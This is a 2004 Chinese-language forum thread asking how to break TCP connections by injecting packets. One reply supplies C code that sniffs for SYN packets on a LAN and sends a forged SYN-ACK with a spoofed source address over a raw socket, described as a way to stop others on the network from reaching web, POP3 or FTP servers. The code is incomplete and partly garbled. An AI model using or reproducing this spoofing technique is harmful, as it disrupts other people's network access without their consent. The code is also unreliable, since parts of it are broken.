|
阅读:6203回复:3
可以通过简单的方式断开tcp连接吗?
是否可以通过发送一个断开的tcp包断开已经连接的tcp 应用?
例如ie 上网, snifer 发现有一些不好的网站地址,然后发送一个断开的tcp包,使得ie不能连接到该网站? 理论可以实现吗?不用 winpcap 吗?用 RAW_PACKET 吗? |
|
|
沙发#
发布于:2004-10-16 15:23
伪造IP包,禁止TCP连接
大家是否想过在局域网内如何禁止别人访问web server,pop3,ftp等。那么如何禁止呢?大家都知道TCP是面向连接的,连接时有三次握手,之后才能确认连接成功。那么我们就应该能在第一次握手之后伪造一个服务方的握手返回,从而达到TCP连接不成功,无法访问某端口。程序如下: void DeCodeIP(buf,iBufSize) //解析侦听到的IP数据包 { IPHEADER * pIPhdr; TCPHEADER * pTCPhdr; pIPhdr=(IPHEADER * )buf; //获得TCP header的起始位置 int iIphLen = sizeof(unsigned long) * (pIPhdr->h_lenver & 0xf); pTCPhdr = (TCPHEADER* )(buf+iIphLen); //判断是否为第一次握手IP数据包,pIPhdr->th_flag=2 即("-s----") if (iBufSize==48) && (pIPhdr->iProtocol==IPPROTO_TCP) && (pIPhdr->th_flag==2) sendTCP_SYNACK(szDestIP,szSourceIP,pTCPhdr->destPort,pTCPhdr->srcPort,pTCPhdr->seq); } void sendTCP_SYNACK(char * szSrcIP, char * szDestIP,unsigned short srcPort,unsigned short destPort,unsigned int iAck) { int iErrorCode; SOCKET s; IP_HEADER ip_header; TCP_HEADER tcp_header; PSD_HEADER psd_header; struct sockaddr_in remote; char * ptr=NULL; //创建socket s=socket(AF_INET, SOCK_RAW, IPPROTO_IP); if (CheckSockError(s, "socket-tcp")) return FALSE; BOOL bOpt = TRUE; iErrorCode = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt)); if (CheckSockError(iErrorCode, "setsockopt-TCP")) { closesocket(s); return FALSE; } //---end­ //伪装连接 unsigned short iTotalSize=44; unsigned short iTCPSize=24; char *sendBuf=new char[iTotalSize]; ip_header.h_lenver=(4<<4 | sizeof(ip_header)/sizeof(unsigned long)); //高四位版本号,低四位首部长度 ip_header.total_len=htons(iTotalSize); //16位总长度 ip_header.tos=0; ip_header.ident=htons(17393); //16??±êê? ip_header.frag_and_flags=0; //3??±ê????,13??offset ip_header.ttl=57; //8??éú′?ê±??TTL ip_header.proto=IPPROTO_TCP; //8??D­òé(TCP,UDP?­) ip_header.checksum=0; //16位校验和 ip_header.sourceIP=inet_addr(szSrcIP); //32位远地址? ip_header.destIP=inet_addr(szDestIP); //32位目的地址? ip_header.checksum=checksum((USHORT *)&ip_header,20); //填充TCP首部 tcp_header.th_sport=htons(srcPort); //源端口 tcp_header.th_dport=htons(destPort); //目的端口 tcp_header.th_seq=htonl(0x581A784D); //SYN序列号 tcp_header.th_ack=htonl(iAck+1); //应答序号 tcp_header.th_lenres=(iTCPSize/sizeof(unsigned long)<<4|0); //TCP长度和保留位 tcp_header.th_flag=0x12; //SYN 标志 tcp_header.th_win=htons(65535); //窗口大小 tcp_header.th_urp=0; //紧急指针 tcp_header.th_sum=0; //校验和 //填充TCP伪首部(只用于生成校验和) psd_header.saddr=ip_header.sourceIP; psd_header.daddr=ip_header.destIP; psd_header.mbz=0; psd_header.ptcl=IPPROTO_TCP; psd_header.tcpl=htons(iTCPSize); ZeroMemory(sendBuf,iTotalSize); //计算tcp校验和,包含伪TCP header memcpy(sendBuf,&psd_header,sizeof(psd_header)); ptr=sendBuf+sizeof(psd_header); memcpy(ptr,&tcp_header,sizeof(tcp_header)); ptr=sendBuf+sizeof(psd_header)+sizeof(tcp_header); *ptr=(char)0x02;*(ptr+1)=(char)0x04;*(ptr+2)=(char)0x05;*(ptr+3)=(char)0xb4; tcp_header.th_sum=checksum((USHORT *)sendBuf,sizeof(psd_header)+24); ZeroMemory(sendBuf,iTotalSize); //填充发送缓冲区 memcpy(sendBuf,&ip_header,sizeof(ip_header)); ptr=sendBuf+sizeof(ip_header); memcpy(ptr,&tcp_header,sizeof(tcp_header)); ptr=sendBuf+sizeof(ip_header)+sizeof(tcp_header); *ptr=(char)0x02;*(ptr+1)=(char)0x04;*(ptr+2)=(char)0x05;*(ptr+3)=(char)0xb4; remote.sin_family = AF_INET; remote.sin_port = htons(destPort); remote.sin_addr.s_addr = inet_addr(szDestIP); iErrorCode = sendto(s, sendBuf, iTotalSize, 0, (SOCKADDR *)&remote, sizeof(remote)); CheckSockError(iErrorCode, "SYNACK sendto"); //伪装关闭连接 iTotalSize=40; iTCPSize=20; // end-------- closesocket(s); delete[] sendBuf; return TRUE; } |
|
|
板凳#
发布于:2004-10-24 14:43
用应用层的IP helper Api即可
|
|
|
|
地板#
发布于:2004-10-25 11:07
iphlpapi.dll中的函数好像都未公开吧,VC6.0中的MSDN上面都没有
请问怎么用呢 |
|
|